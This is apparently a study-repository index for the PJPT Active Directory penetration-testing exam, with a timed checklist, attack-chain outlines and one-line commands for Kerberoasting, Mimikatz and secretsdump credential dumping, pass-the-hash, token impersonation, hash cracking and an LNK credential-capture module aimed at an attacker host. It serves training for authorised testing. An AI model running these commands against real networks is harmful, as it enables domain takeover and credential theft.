β PJPT - Completed
π― Quick Reference Index
This repository contains comprehensive guides for Practical Junior Penetration Tester (PJPT) preparation. Each document focuses on specific attack techniques commonly encountered in Active Directory penetration testing.
π Available Documents
Core Attack Techniques
Kerberoasting - Service account password extraction and cracking
Token Impersonation - Post-exploitation privilege escalation via token stealing
LNK File Attacks - Malicious shortcut file creation for credential theft
GPP/cPassword Attacks - Group Policy Preferences credential extraction
Mimikatz Overview - Comprehensive credential dumping and Kerberos attacks
NTDS.dit Extraction - Active Directory database dumping and hash analysis
Golden Ticket Attacks - Ultimate domain persistence via krbtgt compromise
Recent AD Vulnerabilities - ZeroLogon, PrintNightmare, Sam the Admin
Strategic Approaches
Post-Compromise Attack Strategy - Systematic methodology for post-exploitation activities
Post-Domain Compromise Strategy - What to do after achieving Domain Admin access
Initial Internal Attack Strategy - First steps after gaining internal network access
Domain Enumeration - Active Directory reconnaissance techniques
Network-Level Attacks
SMB Relay Attacks - NTLM relay attack techniques
LLMNR Poisoning - Link-Local Multicast Name Resolution attacks
IPv6 Attacks - IPv6-based attack vectors
Passback Attacks - Printer and device credential extraction
Credential Attacks
Pass Attacks - Pass-the-Hash, Pass-the-Ticket, and related techniques
π PJPT Exam Checklist
Phase 1: Initial Access & Enumeration (30 minutes)
# β
Network Discovery
nmap -sC -sV -oA initial_scan target_rangeLLMNR/NBT-NS Poisoning
Initial Credential Gathering
Phase 2: Post-Compromise Quick Wins (30 minutes)
# β
Quick Assessment with any valid credentials
crackmapexec smb target_range -u username -p password --sharesImmediate Post-Compromise Actions
Credential Dumping & Analysis
Phase 3: Deep Enumeration & Privilege Escalation (60 minutes)
# β
Comprehensive Domain Analysis
bloodhound-python -d domain.local -u user -p pass -gc dc.domain.local -c allDomain Environment Mapping
Advanced Attack Techniques
Phase 4: Lateral Movement & Persistence (30 minutes)
# β
Systematic Lateral Movement
crackmapexec smb target_range -u admin -H hash --pwn3dLateral Movement Techniques
Persistence & Impact
Phase 5: Post-Domain Compromise - "Welcome to My Domain!" π¦ (60 minutes)
# β
Maximum Value Demonstration
secretsdump.py domain/admin@dc.target.local -ntdsPost-Domain Compromise Strategy - Complete Value Demonstration
β‘ Quick Command Reference
Essential One-Liners
# Kerberoasting
GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request
# GPP Password Extraction
auxiliary/scanner/smb/smb_enum_gpp
# Credential Testing
crackmapexec smb target_range -u user -p pass --shares
# Token Impersonation
load incognito; list_tokens -u; impersonate_token DOMAIN\\admin
# LNK File Deployment
netexec smb target -d domain -u user -p pass -M slinky -o NAME=doc SERVER=attacker_ip
# Mimikatz Credential Dump
privilege::debug; sekurlsa::logonpasswords
# BloodHound Data Collection
bloodhound-python -d domain.local -u user -p pass -gc dc.domain.local -c all
# Pass-the-Hash
psexec.py -hashes :ntlm_hash admin@target_ipHash Cracking Quick Reference
# Kerberos TGS-REP (Kerberoasting)
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
# NetNTLMv2 (from Responder)
hashcat -m 5600 netntlmv2_hashes.txt rockyou.txt
# NTLM (from secretsdump)
hashcat -m 1000 ntlm_hashes.txt rockyou.txtπ― PJPT Success Strategy
Time Management (4-6 hours total)
Hour 1: Network discovery and initial access attempts
Hour 2: Post-compromise quick wins and immediate credential gathering
Hour 3-4: Deep enumeration and privilege escalation
Hour 5-6: Lateral movement, persistence, and documentation
Documentation Priorities
Clear Attack Chain - Document step-by-step progression from initial access to domain admin
Command Evidence - Include exact commands used and their outputs
Impact Assessment - Demonstrate business impact of compromise
Remediation Recommendations - Provide specific mitigation strategies
Timeline - Show progression and persistence of access
Common Pitfalls to Avoid
π Integration Points
Attack Chain Combinations
LLMNR Poisoning β Pass-the-Hash β Token Impersonation β Domain Admin
Password Spraying β Kerberoasting β Lateral Movement β Mimikatz β Golden Ticket
LNK File Attack β Credential Capture β GPP Enumeration β Service Account Compromise
Tool Integration Workflow
Responder captures initial credentials
CrackMapExec tests credential validity and finds admin access
Impacket tools perform targeted attacks (secretsdump, GetUserSPNs)
Metasploit provides automated enumeration (GPP, SMB enumeration)
Mimikatz extracts additional credentials from memory
BloodHound maps privilege escalation paths
Manual techniques fill gaps where automated tools fail
π Final Notes
This checklist represents a systematic approach to Active Directory penetration testing aligned with PJPT examination requirements. Each technique builds upon the previous ones, creating a comprehensive attack methodology.
Remember: The goal is not just to achieve domain admin access, but to demonstrate a thorough understanding of the attack chain, document findings professionally, and provide actionable remediation advice.
Practice Environment: Test all techniques in a lab environment before the exam. Tools and commands may behave differently across various Windows versions and domain configurations.
Time Management: Stick to the time allocations suggested above. It's better to have partial access with good documentation than complete access with poor documentation.
Good luck with your PJPT examination! π
Last updated